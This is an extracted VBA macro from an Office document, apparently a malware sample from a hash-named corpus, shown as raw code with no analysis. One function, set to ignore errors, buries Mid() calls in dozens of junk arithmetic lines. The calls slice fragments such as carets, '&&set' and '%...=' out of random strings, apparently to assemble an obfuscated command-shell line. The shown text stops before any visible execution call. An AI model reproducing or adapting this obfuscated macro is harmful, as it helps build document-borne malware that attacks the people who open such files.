Filename     : ./macros/f8b563cf916bfa94d42076e3fc2ab0a59cd1bfa9974311fab8868db35a0f92ab
OLE stream   : Macros/VBA/NLcBSEi
VBA filename : NLcBSEi.bas
----------------------------------------
Attribute VB_Name = "NLcBSEi"
Function KrrZZZYBERPHjG()
On Error Resume Next
jwKzYwZaGT = 871 / Rnd(4) + WPMuupUk + vjXrqjCHzdmHVu * 9 + Int(XWukwssnWdECO * CStr(dTTAPKNkSDk)) + KDRwAAVU * CDate(3624 - 352183467 * 84 / 475) / YujoDCtANl - CSng(620)
hRBaK = 871 / Rnd(4) + SwKmnLQtwaiL + DQzZaiX * 9 + Int(GrPidRwdfXmath * CStr(mffpCMK)) + iHmaSaYXIolMFu * CDate(3624 - 352183467 * 84 / 475) / JuRPRCvk - CSng(620)
jCfjHAn = Mid("i3T7^r^loXZjIi3uZ22jCt5ruUnpwcCXh22a2t50", 5, 3)
LzwfsD = 871 / Rnd(4) + ocWKSGFkdnD + zkipVYdDhtHEZ * 9 + Int(MLHTkESGXhjH * CStr(tvkqjUDkDVM)) + bkhzvVRkiu * CDate(3624 - 352183467 * 84 / 475) / dKCzYtMBJNrjIw - CSng(620)
JUOtjGfLzbf = 871 / Rnd(4) + lpqHHdITq + RMXERWaTj * 9 + Int(dVLbbBaNjiVKP * CStr(GZABKti)) + iBuwLKPlp * CDate(3624 - 352183467 * 84 / 475) / QhoQiPjGDvkLwH - CSng(620)
Olovk = 871 / Rnd(4) + YkWzIqu + IUkJcLOWwzBHjj * 9 + Int(irrTDKkBYA * CStr(whOilDiOufnjk)) + urtjHoVsPrIRW * CDate(3624 - 352183467 * 84 / 475) / kYTMIjPhIPOzZ - CSng(620)
EmJAvzS = Mid("oMvJkLICGfiof9pFYXFBG0V%=jSYQQhv&&seb44X8iVY7Lz", 24, 13)
PMuEDSNC = 871 / Rnd(4) + TwsVZJnIMnKjip + zzpathPqv * 9 + Int(UEqmjWFnArMX * CStr(QlcZbcTiB)) + nwmWVNOEH * CDate(3624 - 352183467 * 84 / 475) / kEEzVfQEtizCai - CSng(620)
jwUAFd = 871 / Rnd(4) + DifWLFw + PkWJuuXfJmY * 9 + Int(jXKAYrJUqwcPvN * CStr(oMnmuHntA)) + iHRqPKfsqTjT * CDate(3624 - 352183467 * 84 / 475) / zTwcjSIGOhi - CSng(620)
hwssBTiJ = 871 / Rnd(4) + pQInNbCSnC + uAkalnFaiLjfD * 9 + Int(LPpXTkXDzjwFRu * CStr(hlRujlQUSs)) + zzDNIlFs * CDate(3624 - 352183467 * 84 / 475) / MNvUSRq - CSng(620)
FsOEw = Mid("2XSLGHmjnjPG2NGJROvpalLzWIsGp2F3Ll5pX", 12, 1)
UNFiGoV = 871 / Rnd(4) + SVzdswiKRqkr + alwXEukUhqT * 9 + Int(iDascTZmHzpjPw * CStr(BJOGiEzJjL)) + KnuOlifiNtDR * CDate(3624 - 352183467 * 84 / 475) / WLEXdwQHFXiLT - CSng(620)
wjtqwkd = 871 / Rnd(4) + HADioHiWz + vOwjFjWbjYvip * 9 + Int(lzzdJCfpXW * CStr(WRPwMOdR)) + LzLEMVAF * CDate(3624 - 352183467 * 84 / 475) / VUcKito - CSng(620)
oRvwBmvjjkp = 871 / Rnd(4) + luhutjtImssL + AkkdwrZk * 9 + Int(zajkvbEPLD * CStr(vtkjzJkuN)) + LiRlPWVtkT * CDate(3624 - 352183467 * 84 / 475) / zPuHOJlREWjpt - CSng(620)
XaRNjArptB = Mid("BkQNLzFEUYYu6GWtHzl%=jTktQlY2GQGBCpS1j7p1TKEcB2", 15, 12)
PlkDWd = 871 / Rnd(4) + BMvIGrcY + RHfXJRNjNlou * 9 + Int(oBZjCCfMn * CStr(HENRVzFIjj)) + DtZhLCPaQHz * CDate(3624 - 352183467 * 84 / 475) / lXtiWoZsW - CSng(620)
wOcWPKFELMz = 871 / Rnd(4) + wncwrvO + MsdGqjNVkLWR * 9 + Int(mluuISiTAZTb * CStr(kjVblptnCkqA)) + qLpKOIuPMB * CDate(3624 - 352183467 * 84 / 475) / EjdfQMSJfEwj - CSng(620)
cpUUv = 871 / Rnd(4) + lXTwArlIdEN + kIABqAPlWNHr * 9 + Int(tbOiTJoHZIB * CStr(OBYpIivzw)) + liUzZclIXPcU * CDate(3624 - 352183467 * 84 / 475) / PWZKuZiL - CSng(620)
CDMihfVB = Mid("5AUGMqSBjjKrjEGzfPQ6v", 6, 11)
GSjjJEsfJEs = 871 / Rnd(4) + JZhXwjBDtjcWip + LjWXfnXC * 9 + Int(NXqRhVVu * CStr(pBoaXScAfKz)) + JlXHzwi * CDate(3624 - 352183467 * 84 / 475) / BMmXVJZtkV - CSng(620)
IHDKmSDAjU = 871 / Rnd(4) + QsmojaWiHtG + qvvJFIqWkK * 9 + Int(DkLihsUR * CStr(FwFSSzrw)) + STSInhKkm * CDate(3624 - 352183467 * 84 / 475) / CYcpFki - CSng(620)
KDaqSXiLQ = 871 / Rnd(4) + NhronWkJDv + IMCLElSKjXm * 9 + Int(ddPQFNsjQJ * CStr(mSRwjkNoidXE)) + VKEnaZmBbL * CDate(3624 - 352183467 * 84 / 475) / LYFfvKLOw - CSng(620)
msioui = Mid("45BzvcuNVKiiutBp7knqQWs%=^heYGU", 19, 10)
EKiWIDw = 871 / Rnd(4) + Xwoqnbz + rqcqFRrGS * 9 + Int(ovzdUzFOOkdIz * CStr(jvUCbcfrKUpT)) + wzljWXNw * CDate(3624 - 352183467 * 84 / 475) / GtbrkZMNpjqvH - CSng(620)
EIoVUzwqsl = 871 / Rnd(4) + kksMUzj + wunwIYAcT * 9 + Int(dwiwhPdYE * CStr(FjvwStUaTJ)) + OJhIYzC * CDate(3624 - 352183467 * 84 / 475) / wisGWjQWnD - CSng(620)
bKFZJzQjDwA = 871 / Rnd(4) + zoiqLwkd + AqJPdEHllkvpa * 9 + Int(krGiziGdLoo * CStr(rrjBzDcFbBaJj)) + izELMVWN * CDate(3624 - 352183467 * 84 / 475) / wFSnzhXiVaoMP - CSng(620)
kBwmJVjwXs = Mid("Net %iwdOVUbSWAlGS45bOi", 2, 7)
fcFszDQD = 871 / Rnd(4) + jwuMLMzqdPD + IKQOoAnJQa * 9 + Int(FsMdYNBXhXraFU * CStr(VvYIZJvEkwGUcV)) + uMIzoUwjadbrWC * CDate(3624 - 352183467 * 84 / 475) / kLurirkHB - CSng(620)
jfqludzmK = 871 / Rnd(4) + AIquvbjcjusKVi + YdDistMjkSN * 9 + Int(PGNIBORHWvh * CStr(zBJdZiHT)) + zuvHSIDnZFb * CDate(3624 - 352183467 * 84 / 475) / wUWTmqwDaFdv - CSng(620)
dhlzM = 871 / Rnd(4) + KocjSsZBhciRI + cWMwfzRYCSM * 9 + Int(akqHKFHHifWDHk * CStr(qoZmSCP)) + IflbDYlmJ * CDate(3624 - 352183467 * 84 / 475) / XSpLZSZKBB - CSng(620)
RVhvOMOcDB = Mid("uVuGJK5EU3DEBcwQNh   rPrwm779mU", 19, 3)
IflbmXPnU = 871 / Rnd(4) + lqkjJFKtCRMRAj + OTzpFaA * 9 + Int(nKnoLQBsQzMh * CStr(SEPzRouDJ)) + lHqpHHo * CDate(3624 - 352183467 * 84 / 475) / TkJzYWRzdAYwR - CSng(620)
VVfKltLL = 871 / Rnd(4) + ZwmJostcC + YTJksfHRiCrOIN * 9 + Int(DarAjnCXSP * CStr(jQYFXvCc)) + OsckbEAtAYKpY * CDate(3624 - 352183467 * 84 / 475) / kRBcTLVwrUjwr - CSng(620)
YELOP = 871 / Rnd(4) + CnvOipolGddIC + UbulbJtwIVjt * 9 + Int(RLtfNkzFDtsZ * CStr(ChijTQTkfBFnUH)) + FfZipGWaMzQYFc * CDate(3624 - 352183467 * 84 / 475) / hCMcHLScC - CSng(620)
tHSoCkC = Mid("aZJ3ESYUlZCZ9850st %HfdcFYhqkrVpt", 18, 7)
NDivWiDu = 871 / Rnd(4) + cfwLfVFLwGYfm + WuFTKano * 9 + Int(SjRXRBHBfN * CStr(RVbwKDjZ)) + uDoZMZwOQ * CDate(3624 - 352183467 * 84 / 475) / QFoJdcOzoKqF - CSng(620)
FjNmjCvw = 871 / Rnd(4) + cQXLKdioYTzJ + TKBSGiIXudi * 9 + Int(YvJIYwcfMsjwQ * CStr(Lmvohvo)) + SuXfjlRNi * CDate(3624 - 352183467 * 84 / 475) / sSmhZfAXXdRbb - CSng(620)
wkziQzFAPtl = 871 / Rnd(4) + RirBSGIHqNVbPv + KrEtkuwCdLzWv * 9 + Int(vPboJWu * CStr(XiIHiZrSiO)) + WmwFzVzVbOpV * CDate(3624 - 352183467 * 84 / 475) / NAvwumFYzpTa - CSng(620)
wJLTw = Mid("ZTw8rcnHiH3vh7c4LnBUEGpukof2", 12, 1)
TsCEzwAH = 871 / Rnd(4) + BCWWbFv + EIdOltNqOzJv * 9 + Int(zRiMQoK * CStr(LzrTUdjPvl)) + rJOdELuGJjP * CDate(3624 - 352183467 * 84 / 475) / RfzDlsJLR - CSng(620)
ctvzuVDh = 871 / Rnd(4) + zNTGltrXmzfpMV + wEdjbUj * 9 + Int(sGIhzrCOMP * CStr(EGdMWwrOjzv)) + vZlnwEGtfQ * CDate(3624 - 352183467 * 84 / 475) / bAdLsfklSakQw - CSng(620)
DiHawzP = 871 / Rnd(4) + KsJlvRQjaTOj + wjoZBVh * 9 + Int(rvhZnWZ * CStr(XlZLFzVUSQcqcF)) + CkaBUwSIpjlSzb * CDate(3624 - 352183467 * 84 / 475) / HuqlDhpV - CSng(620)
vvNOkI = Mid("loN2paF7h3tSCJI6jlvXHXzNHDfttlp0Zh&!%Hfdcij5Y", 35, 9)
bIDYw = 871 / Rnd(4) + sGmjFAbwkN + NEDJGVwn * 9 + Int(CMtlziwLd * CStr(KInRGzTJZQNiPP)) + ibjbLFn * CDate(3624 - 352183467 * 84 / 475) / jTjMBkXEQTo - CSng(620)
QjIdtCtpj = 871 / Rnd(4) + NUQfQSj + swGZdDpBwJ * 9 + Int(XRIihjkALoDI * CStr(uWhPSozwIMJAau)) + kiZWbkopEpjwf * CDate(3624 - 352183467 * 84 / 475) / UjpoLfGVZ - CSng(620)
WrUXzFhzz = 871 / Rnd(4) + zamzMnL + XDXwdiUGPj * 9 + Int(qWfGwZkRZ * CStr(LzKbNDE)) + jPYtQFcvkjTPQ * CDate(3624 - 352183467 * 84 / 475) / jCzjUTnXbVlVL - CSng(620)
cWIduTcLCs = Mid("SIJtdOS%=ASFGWRSni4S5E60pA2afjonkd5N", 7, 12)
zIhww = 871 / Rnd(4) + KKmOEziGouQc + jjJFhdajs * 9 + Int(hnjTLOOjOJ * CStr(MRwZkFLcHkAsR)) + IBZZswAS * CDate(3624 - 352183467 * 84 / 475) / FaYfSsZLBSXTP - CSng(620)
WHizXmGiO = 871 / Rnd(4) + awMTTTC + iFzWTRL * 9 + Int(DXNqUPXiv * CStr(KoBDIpUchlNVz)) + jvqQFoNDI * CDate(3624 - 352183467 * 84 / 475) / HzhriKY - CSng(620)
OjjDqqK = 871 / Rnd(4) + fzYOGkjj + OKDMoJWKquaszL * 9 + Int(tkhYwZtpsq * CStr(cTkthHZfJVOfkC)) + HhZpTjlzVWC * CDate(3624 - 352183467 * 84 / 475) / hVUULWuh - CSng(620)
OKWbPrNFp = Mid("2rjacIkDoa92Z", 3, 2)
abuiKrM = 871 / Rnd(4) + XbJNCawHCrka + hXAHYYG * 9 + Int(HiGfzvIIdt * CStr(MfwYEVsPTw)) + VTiAZchjJmRI * CDate(3624 - 352183467 * 84 / 475) / wChFiowZw - CSng(620)
IvYPJjiKN = 871 / Rnd(4) + GPonnnF + cXdhIczcoGq * 9 + Int(lGXImDj * CStr(qcFjkJX)) + LOjGrNu * CDate(3624 - 352183467 * 84 / 475) / wabFiqrwAuUz - CSng(620)
YUwuJn = 871 / Rnd(4) + OXjwwlfIn + VInzwWjbtjk * 9 + Int(XibBonlfANXFTd * CStr(dkzddiiuoOjJI)) + WfOdTABX * CDate(3624 - 352183467 * 84 / 475) / wsXHaIkiiTfCqv - CSng(620)
ZRnYE = Mid("HKEMWM5zRTuMP6z1IkDkG5bJl9QTj3EVuNLEGHD", 8, 2)
tDtrwRjIjib = 871 / Rnd(4) + jAjGAozRzzzFv + aWjJXLnLM * 9 + Int(abzlJjppXMi * CStr(zArZvSzdb)) + iZQZQlw * CDate(3624 - 352183467 * 84 / 475) / EVoIjZoOIRHKh - CSng(620)
BfvFssJt = 871 / Rnd(4) + AUiNlVoljS + UXLQXRTlnXfsaz * 9 + Int(daqTSXmEbSwCO * CStr(vazujmVZBKQRJ)) + AUcINzsNuM * CDate(3624 - 352183467 * 84 / 475) / ahSkwaPFtswizq - CSng(620)
ZdZjrzPYD = 871 / Rnd(4) + lMWjSwQVLizZ + ZVkPEsjHJZrTS * 9 + Int(jJiVQSzoDChT * CStr(XjJFIGjPsYBDSw)) + cmfPzNjLdNi * CDate(3624 - 352183467 * 84 / 475) / slRhiluL - CSng(620)
CcCBaCdtpE = Mid("HWV0jjJ1jCrfl3ELTFiPntrh%=okjjYcNT6Z", 17, 11)
wZnTCSKXT = 871 / Rnd(4) + SEZjDAOOE + pooQwijk * 9 + Int(IECpDjBMPfDlfR * CStr(fooNJwM)) + OcIlbpvJQ * CDate(3624 - 352183467 * 84 / 475) / BhIQOVzCozjAVK - CSng(620)
WGkPpCnBlU = 871 / Rnd(4) + CSmjCZGzilT + FpOXwWmXrQfr * 9 + Int(WAYPbthwouFS * CStr(TCvcQqw)) + HXTKoXjNkmmuBj * CDate(3624 - 352183467 * 84 / 475) / iiHsllRvIE - CSng(620)
rTblNMfzD = 871 / Rnd(4) + nlKuTawwmn + vzZWUVnn * 9 + Int(jsPZSQHJNjO * CStr(zOnDkPzY)) + lVcBazc * CDate(3624 - 352183467 * 84 / 475) / fNNihnuWl - CSng(620)
bkHMa = Mid("78hLzpQYRjA7u2Cset %FInapwznL3U5aUMC7lRoGPk", 16, 13)
IipAUrizLz = 871 / Rnd(4) + DkcOAptmOcEFmV + kDISXAmdNuJzNJ * 9 + Int(cKFsTzlVlzBOR * CStr(icUXnAOnphvRGO)) + qrjdZztAuB * CDate(3624 - 352183467 * 84 / 475) / whWVWmUjjRoaZJ - CSng(620)
mMWnVp = 871 / Rnd(4) + JIUrhNo + VMDmXOKsn * 9 + Int(jialkhwlokjC * CStr(uiuDilaKlDat)) + rzolTiu * CDate(3624 - 352183467 * 84 / 475) / THfYXmuvYEhTi - CSng(620)
SCvMaPfWnUB = 871 / Rnd(4) + pVYwCsXBvGV + szkcaWoBjQUK * 9 + Int(wafCCRGU * CStr(KYczwGbjbPABcj)) + pNDkHuYANnFSrz * CDate(3624 - 352183467 * 84 / 475) / oPQumMAdXiZAp - CSng(620)
NiYDA = Mid("XLrTDCGwncmLQfHt&u44RIQLmf8rB6APirLXSL", 17, 1)
klWfwiHGVi = 871 / Rnd(4) + DdLfHMZv + zrjqwwCQBHs * 9 + Int(bPfHwjPNzta * CStr(iwLaoXhQYc)) + jrwzwVnfMmh * CDate(3624 - 352183467 * 84 / 475) / NfXJjKhfGRG - CSng(620)
rilHHXXlE = 871 / Rnd(4) + DzALbcXoUOIF + MziiLQk * 9 + Int(ZMzkOoRdR * CStr(cvKptTibrhsTTD)) + TJMWiYOb * CDate(3624 - 352183467 * 84 / 475) / ilAbMoGKDR - CSng(620)
KlRTz = 871 / Rnd(4) + AlcciZcD + kwPBjQrLNOnBTz * 9 + Int(QNBGqzYOkpwNtL * CStr(mKiidjI)) + ztqTtDTF * CDate(3624 - 352183467 * 84 / 475) / nhMQXWMAMjfL - CSng(620)
sjOzzR = Mid("GhDdVZmbAwzSJVoZfpNou2Xr1CL", 2, 11)
WmzGPoFVCju = 871 / Rnd(4) + JuXGKwjZCVG + vZvfEHiYNUmKH * 9 + Int(GPCaiQBYB * CStr(lGMlopYCYr)) + BQJBDUs * CDate(3624 - 352183467 * 84 / 475) / pHMwrpUXb - CSng(620)
HvzzA = 871 / Rnd(4) + YBNRuwYqMz + tFnSRQqvMhXrm * 9 + Int(BVTwISBhmWjDvK * CStr(SjnSTFRQwN)) + NhJpBJbW * CDate(3624 - 352183467 * 84 / 475) / dFrEimMTRmOUj - CSng(620)
NYmfXHv = 871 / Rnd(4) + qrXYWtwvzkYvk + QNFwsZivJGLR * 9 + Int(HUwTRwOiAi * CStr(uPDHXIstXai)) + kWiCJuhQMEU * CDate(3624 - 352183467 * 84 / 475) / aAQGzWEPfbDcV - CSng(620)
MkBCPuHv = Mid("mAjoUa54iuhWXsfqBNNj&&set fjGT2XTosUILhT19", 14, 13)
miZqruLYd = 871 / Rnd(4) + tzjYTpjFWl + FTXwUWbYQsNrjo * 9 + Int(swwKwqhIQsRl * CStr(jJXiGHZS)) + XzPmvPjfFAkmz * CDate(3624 - 352183467 * 84 / 475) / HLmGYKGDDlTs - CSng(620)
UvcPk = 871 / Rnd(4) + jEHRbNFU + HRsqJRkT * 9 + Int(izpMKGtnuaMEH * CStr(VvYGsCwISZDww)) + WwQlvtGzSWtB * CDate(3624 - 352183467 * 84 / 475) / oSfHCAZWuk - CSng(620)
vbztWEn = 871 / Rnd(4) + VilcONDb + vLuRcln * 9 + Int(AWjXQXUAB * CStr(iTtdTDIL)) + TYVYtKF * CDate(3624 - 352183467 * 84 / 475) / aMGiVPmlz - CSng(620)
uzAPSfQcW = Mid("kweuY30Xp0mIuVrT9UNcRVWGw7PO", 2, 2)
SQQzaAiO = 871 / Rnd(4) + rRvVfQJM + LRwJbINl * 9 + Int(dCMriIqnRA * CStr(ZLbLFtdwlUBNht)) + XUWjtnoA * CDate(3624 - 352183467 * 84 / 475) / iwAmnfrzI - CSng(620)
DpwHoW = 871 / Rnd(4) + tYYkLnF + ownrnvM * 9 + Int(jmpWHzBpC * CStr(MXAYVIbSu)) + SIIPPwTcaK * CDate(3624 - 352183467 * 84 / 475) / CcNZKARzw - CSng(620)
lAYGVpllcbG = 871 / Rnd(4) + iAqmDiiPz + bpizSlW * 9 + Int(lGLkLJdGs * CStr(KGcCETKMjhSzP)) + owqtUCUCIb * CDate(3624 - 352183467 * 84 / 475) / BDwpjIzpn - CSng(620)
EvoDVTw = Mid("8LBVfLIK8Bs%!         NE0umDETuHr0MIT3", 11, 12)
ilBAqXha = 871 / Rnd(4) + jiuaiDQdfQ + BmAbdZGIdY * 9 + Int(sAKumzKIJ * CStr(wCjaOphuDz)) + tvBqMwjaLpSwUq * CDate(3624 - 352183467 * 84 / 475) / QnRQSXGzCkRAPk - CSng(620)
OSRICIiaXJ = 871 / Rnd(4) + RKmYriibbZs + ViFqGfEjfzkM * 9 + Int(czvOkBoX * CStr(uWwNBNhii)) + mWqOHOfzKM * CDate(3624 - 352183467 * 84 / 475) / TZaOPliMrYEKFj - CSng(620)
FBzpZ = 871 / Rnd(4) + OZZTwFIEaB + hwffDOkTYtd * 9 + Int(jXmvwFuzRplat * CStr(AroHjrOopI)) + WjCQvLjkmt * CDate(3624 - 352183467 * 84 / 475) / LJKwfEMsMEmfOs - CSng(620)
PKWCii = Mid("jHACPwZ%=vHzcDMwr2op2NjkHtBQVmKlpW3jNVC57moN8f", 6, 12)
hviFPjUClY = 871 / Rnd(4) + rtdqzzOMZnlj + AEBdLQawYzmbz * 9 + Int(qAiMliYXmV * CStr(NCFNAadCtM)) + XawoJmTtrPAbY * CDate(3624 - 352183467 * 84 / 475) / qbzEPcRf - CSng(620)
NHNXoiENd = 871 / Rnd(4) + WhkIXuOR + LSclcOAL * 9 + Int(pKPozTiuEOTuoz * CStr(AfCtPAGrTicQk)) + CNbNiwhzihQad * CDate(3624 - 352183467 * 84 / 475) / AwMXVmkwLGvwi - CSng(620)
XINZi = 871 / Rnd(4) + wNVjXZIZ + ICdINzV * 9 + Int(EsdEMbhBKwiz * CStr(jWrQAaoCvUj)) + uTVihNCjdYYBF * CDate(3624 - 352183467 * 84 / 475) / moiNaibbYjls - CSng(620)
OoNWJzwZri = Mid("qJcf%SEwawipLbi25Ocs", 5, 7)
HNrYail = 871 / Rnd(4) + wJXDzFCBs + FAHDwVcpXQqV * 9 + Int(EuzEFBUSm * CStr(OBYJMdYnz)) + fRUihzq * CDate(3624 - 352183467 * 84 / 475) / FZRcarSIzAz - CSng(620)
TpkDjFid = 871 / Rnd(4) + mHAOcLWzu + LzLspdCkJBLwAs * 9 + Int(hqozkOHFlTj * CStr(NOJpkhph)) + MwDDqtXaGoGH * CDate(3624 - 352183467 * 84 / 475) / vUhwJjDtaYFW - CSng(620)
oDcrGSQq = 871 / Rnd(4) + YPTntCYLQMzdrP + naSXFLqMMvla * 9 + Int(qEdXpzhPwhli * CStr(iNtaolLEfhj)) + soiDGrHcrVL * CDate(3624 - 352183467 * 84 / 475) / bnshXothsdjc - CSng(620)
CEUtJAC = Mid("O17INIm2Zp&&srlulTMkZVY rrpN3PwtoAzpdER", 10, 4)
BEPaKMQqbp = 871 / Rnd(4) + VzMaQKLvUtkvt + jfiiczcTpH * 9 + Int(XGdolYwhBYYO * CStr(YvwpaazCPOU)) + vtcXMBJEn * CDate(3624 - 352183467 * 84 / 475) / EiGjVmOswLRwG - CSng(620)
BQiEp = 871 / Rnd(4) + oDwNtkUrMpr + GiWGluIA * 9 + Int(YCAAsOmNcsRfL * CStr(zDwFLPi)) + nBiSLtGiUjvqP * CDate(3624 - 352183467 * 84 / 475) / zNBVhik - CSng(620)
ncYXMQpA = 871 / Rnd(4) + DmtOKkIrJaqi + JpWOJsfrNj * 9 + Int(ELoXRJzznvUZI * CStr(uDkNZftrRECawH)) + appDBJz * CDate(3624 - 352183467 * 84 / 475) / kZAdsrZpPNTPov - CSng(620)
QbQraobTQPc = Mid("FL2V            fSqoOc3", 5, 12)
jdZXOoY = 871 / Rnd(4) + ajudWCopwkElOw + ZDtGtYkkVk * 9 + Int(GiDphEDrbwYhWE * CStr(ijKlilwscSoXqX)) + vZtYwGlHCAhXX * CDate(3624 - 352183467 * 84 / 475) / AWWCzuBajG - CSng(620)
KiHiraH = 871 / Rnd(4) + RXiszQcKqAaN + bdcODrdNKuLHh * 9 + Int(zNmnrjlc * CStr(TfShjnoVYNijt)) + jdSXZHdWl * CDate(3624 - 352183467 * 84 / 475) / GizEMijIw - CSng(620)
EzWwZYi = 871 / Rnd(4) + HqbXtjNT + CzowHnscIlwO * 9 + Int(UbvRVqdnVpn * CStr(pPKjIUUD)) + UBiYuMBYRwJw * CDate(3624 - 352183467 * 84 / 475) / VzbbKWqwhJB - CSng(620)
cNFBCs = Mid("TGZaJMIjdTFiPrGf79KzTJJq3uEhrpm0BoiknYHl5", 9, 5)
BMFBYNh = 871 / Rnd(4) + IilJzaVYmtwaE + CKZJLVKwuAaBpk * 9 + Int(pjalDFAs * CStr(azmFjrTj)) + wBCJXwciMok * CDate(3624 - 352183467 * 84 / 475) / vkkPzNYpBtCS - CSng(620)
srvSFtsTH = 871 / Rnd(4) + ubDmLUAjVbAKwF + ZDimMJYL * 9 + Int(lQIQmdjAR * CStr(FNHDtcjjFwm)) + FfazjoHCpWQmB * CDate(3624 - 352183467 * 84 / 475) / LktruztUAwRzoJ - CSng(620)
RTajHIrqBw = 871 / Rnd(4) + jMiFMDhub + jGjJdIYtMHaiO * 9 + Int(pmiurZF * CStr(ktnktZzkDoTuBJ)) + DujczpKpE * CDate(3624 - 352183467 * 84 / 475) / hPaZmDClkWnWtO - CSng(620)
qPJSKUEdOaB = Mid("IYijGRuvbNa%=Q3WfC2XCUbt6", 3, 11)
dQRacttGsBX = 871 / Rnd(4) + ZTNisKdqpts + PmjwVCwRwqNDnz * 9 + Int(iifkzzWQCDHI * CStr(itDzBFdhRzwz)) + sjjFJrtZwLJJt * CDate(3624 - 352183467 * 84 / 475) / tWjtNtPjCmQBhV - CSng(620)
BOOlKRRI = 871 / Rnd(4) + pwATRYRcUCFlZ + JNDMOlmaIH * 9 + Int(nBvCEaOrnOB * CStr(ZLVHIYaUO)) + LmrhvXUF * CDate(3624 - 352183467 * 84 / 475) / ptsdWWaQc - CSng(620)
jYlJBdrIIjQ = 871 / Rnd(4) + NijmJFm + ztPPKjitnIJk * 9 + Int(lFjDaJhw * CStr(HJXUlhaWkrHpi)) + ziEzUtc * CDate(3624 - 352183467 * 84 / 475) / YltcZAiivEkIlF - CSng(620)
vtBLdvnB = Mid("QiZwznLGDG6NU7OWlZr", 2, 6)
mvTriWA = 871 / Rnd(4) + tmHHtdBtddCin + ipIKXiqX * 9 + Int(ALahhwkiIzdV * CStr(EfwEtiqbMH)) + jzjNPsz * CDate(3624 - 352183467 * 84 / 475) / WDHvTvUututkKq - CSng(620)
wJwVs = 871 / Rnd(4) + mPqmqJVisj + nGbFqlOzF * 9 + Int(rVPCLHYw * CStr(YkwGjLmw)) + jRKABzWVGTdwL * CDate(3624 - 352183467 * 84 / 475) / kPvubkiC - CSng(620)
GfGiQ = 871 / Rnd(4) + ldMTkMjG + EUAiRXSQzdzTz * 9 + Int(iIZjzhTWvqsv * CStr(CZNnpzTqwvld)) + bckjqnothK * CDate(3624 - 352183467 * 84 / 475) / ciZUiZKp - CSng(620)
owzwTH = Mid("QwJAcaTLroLjGoBXHQO2VhI1ckzD3KGBH35cARL7uPh5u", 5, 14)
CMEppsp = 871 / Rnd(4) + fkHcrAstDnXTnw + TRfqAEVMNaLro * 9 + Int(LOLiUfQtU * CStr(UOaZInrzSEa)) + EoCsKXuC * CDate(3624 - 352183467 * 84 / 475) / JDcsZLpTRaa - CSng(620)
TSFUIn = 871 / Rnd(4) + haqLpTmolEvahC + phAAVmhN * 9 + Int(zCJlCfqKv * CStr(TikVYALszTJ)) + GDtVfFWJN * CDate(3624 - 352183467 * 84 / 475) / NbNnJBm - CSng(620)
Omwmzzn = 871 / Rnd(4) + AVlivDZjOYjqBJ + bbVszSzLKz * 9 + Int(jbCdAiAMDTQO * CStr(UUTRkUmrP)) + NswiaiBJbjOTw * CDate(3624 - 352183467 * 84 / 475) / kXFpoGDLMGXf - CSng(620)
izEME = Mid("GZl^tHCD7HuiiEJ", 4, 1)
FXaUG = 871 / Rnd(4) + NlfCibE + cAKthtEi * 9 + Int(GsjAknlSTVIHlq * CStr(GtFYjEUR)) + TdWzTSTXf * CDate(3624 - 352183467 * 84 / 475) / DJFFcztjPGvEq - CSng(620)
hoRds = 871 / Rnd(4) + VuzuTSJPHt + krFLnqoBtiVl * 9 + Int(dnTzGBcVRr * CStr(PiBEjdkDLcmn)) + hddQkarA * CDate(3624 - 352183467 * 84 / 475) / bRjwMJFR - CSng(620)
WbffA = 871 / Rnd(4) + znonjzrl + PhHRmzABlcu * 9 + Int(BAocapUFLVPn * CStr(zjifrfzS)) + qYVjHkOFKbwX * CDate(3624 - 352183467 * 84 / 475) / nAKFJWfPtRTEmT - CSng(620)
IUWEuYMpaJL = Mid("LB9wa1pRuvbNa%!!%iw40Mzo2uZXDENbXE3E0M83", 8, 12)
aSUdpDmaCU = 871 / Rnd(4) + SAVvJpkU + uRZtqAKPc * 9 + Int(LkrzjGDkXi * CStr(bwuPTnnlU)) + fQKzijhafnwjj * CDate(3624 - 352183467 * 84 / 475) / bbAmpGE - CSng(620)
zizvSouuTis = 871 / Rnd(4) + aWjuBNqUWkU + GZjAWWPhz * 9 + Int(PfdowmiGPMNYr * CStr(mduMQacAzRovK)) + BicHhnHBRNP * CDate(3624 - 352183467 * 84 / 475) / lPVHEih - CSng(620)
nizzFM = 871 / Rnd(4) + mwSSfdXN + dIkjUjBAXW * 9 + Int(rvUuRoos * CStr(AwNjSdMfQDDD)) + PTYvZGuwl * CDate(3624 - 352183467 * 84 / 475) / kuUrdYArp - CSng(620)
uUVchYL = Mid("O8rfWml41j3D6o7ta54clhZs&&set %cwQDzKzCtAAJ", 24, 9)
rSHPY = 871 / Rnd(4) + OtbCRXLOhLzCb + FkkGqEk * 9 + Int(LhwMoMfpMFOX * CStr(ICZqKcsTF)) + McfKkXwsd * CDate(3624 - 352183467 * 84 / 475) / chuGFiw - CSng(620)
fqWAdTawPKu = 871 / Rnd(4) + jzPDhVAWnUnhqc + DIDbUcaIIC * 9 + Int(vVFiTZfX * CStr(uPAPNqcMsZozP)) + btjiGWFpHAaZ * CDate(3624 - 352183467 * 84 / 475) / QJANCSjaoHn - CSng(620)
IEXVGm = 871 / Rnd(4) + swtoErzhLPjb + RFTkkJCvRNNlU * 9 + Int(aITkciJaHTXX * CStr(MCMiMBKLbbVVY)) + oakjDjFWZsfDzi * CDate(3624 - 352183467 * 84 / 475) / wANMVpsFfBjJa - CSng(620)
NlCPsdkQj = Mid("H8pdk^l^l&&set %wCoY DwpGn3fkLtqbwYiitz3RN", 6, 11)
rTKXzwabds = 871 / Rnd(4) + dAOPjOHjk + knrYBnEIzpo * 9 + Int(LDsLljjK * CStr(msUdWraXmStu)) + YNViRwVjHwZQ * CDate(3624 - 352183467 * 84 / 475) / KWXdbzZrwuXvf - CSng(620)
RNsMpw = 871 / Rnd(4) + YdhzKkSPNSBMR + fcjKFSVzonSLp * 9 + Int(dAkafrziinakiN * CStr(iMNTRwYOTw)) + VYouiwuVmNiaha * CDate(3624 - 352183467 * 84 / 475) / zuwkVjIiKbEsY - CSng(620)
WjIZjQF = 871 / Rnd(4) + dkNWuSZifpHPjp + iuuMhhDz * 9 + Int(rtUvaSwi * CStr(BrwubiwOfriV)) + QkkUAciz * CDate(3624 - 352183467 * 84 / 475) / ZkEiBziEM - CSng(620)
UUOIAM = Mid("BEZ50slkRTGw9Bntrh%!!%SEwawikLMtOKoZd7r5Y", 15, 14)
